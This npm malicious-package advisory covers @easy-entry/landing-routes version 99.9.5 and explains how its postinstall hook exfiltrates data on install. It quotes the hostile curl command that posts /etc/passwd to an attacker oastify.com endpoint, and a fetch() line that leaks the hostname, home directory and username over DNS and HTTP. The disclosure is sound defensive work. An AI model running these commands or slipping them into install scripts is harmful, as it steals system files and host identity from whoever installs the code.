npm · Malicious package advisory
Malware@easy-entry/landing-routes
MAL-2026-5408
Malicious code in @easy-entry/landing-routes (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (16fd1aa3384490a5c01cbdc619bb61ea5fc70f853c8e8ed2e9836d2ca4617556)
On `npm install`, the package's postinstall hook runs two exfiltration paths against an attacker-controlled Burp Collaborator endpoint. First, package.json line 4 invokes `/usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com`, posting the installer's `/etc/passwd` to a DNS-logging subdomain that encodes the victim's hostname. Second, scripts/scream3gg.js reads `os.hostname()`, `os.homedir()`, and `os.userInfo().username`, hex-encodes them, and issues `fetch('http://' + safeData + '.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com')`, leaking host identifiers via DNS+HTTP. Both paths fire automatically on default install with no opt-in.
Compromised versions (1)
- 99.9.5
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.